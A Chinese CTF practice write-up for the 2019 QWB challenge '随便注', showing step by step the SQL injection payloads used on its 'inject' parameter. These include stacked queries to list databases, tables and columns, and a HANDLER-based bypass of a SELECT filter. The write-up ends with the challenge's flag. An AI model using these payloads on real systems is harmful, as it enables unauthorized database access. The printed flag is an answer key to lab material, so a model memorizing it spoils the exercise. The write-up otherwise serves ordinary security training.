CTF练习日记——[强网杯 2019]随便注 1

先点查询1试试：

再试试查询1'，看是否存在字符注入：?inject=1'#

利用order by查看有几个字段：?inject=1' order by 3#，?inject=1' order by 2#

可以知道有两个字段，接下来利用联合查询：?inject=1' union select 1,2#

发现select被过滤了，那咱们利用堆叠注入来查看数据库，表名，?inject=1';show databases;#，?inject=1';show tables;#

可以看到有两个表，words和1919810931114514，查看一下1919810931114514的字段：?inject=1';show columns from 1919810931114514;#

由于select被过滤了，我们还可以用handler命令进行查看，handler命令可以一行一行的显示数据表中的内容。?inject=1';handler 1919810931114514 open as a;handler a read next;#,得到flag：flag{0e82a043-614c-4abc-9176-7aa3f04c00e9}